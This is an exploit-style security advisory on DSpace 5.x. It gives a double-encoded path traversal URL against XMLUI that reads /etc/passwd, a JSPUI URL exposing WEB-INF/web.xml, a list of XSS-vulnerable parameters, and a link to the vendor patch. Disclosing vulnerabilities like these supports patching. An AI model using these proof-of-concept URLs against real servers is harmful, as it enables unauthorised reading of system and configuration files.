DSpace 5.x suffers from several vulnerabilities, including XSS, Path Traversal
Exploit Title: Dspace Multiple Vulnerabilities
XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface
This version suffers from Path Traversal vulnerability, to exploit this vulnerability i used double encoding for the dot (.)
so the ../ wil be %252e%252e/
POC :
http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
JSPUI (JSP) - traditional JSP-based interface
A. Path Traversal Vulnerability
The first vulnerability in this version allows to read files on server .
POC :
http://TARGET/handle/10673/1/WEB-INF/web.xml
B. Cross Site Scripting (XSS) Vulnerability
The second vulnerability in this version allows to execute arbitrary commands and display arbitrary content in a victim user's browser
The vulnerability exists in several varialbes
- filtertype
- filter_type_1
- filtername
- filter_field_1
All the above varialbes are not sanitized correctly .
PATCH :
Dspace team annoucement article :
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html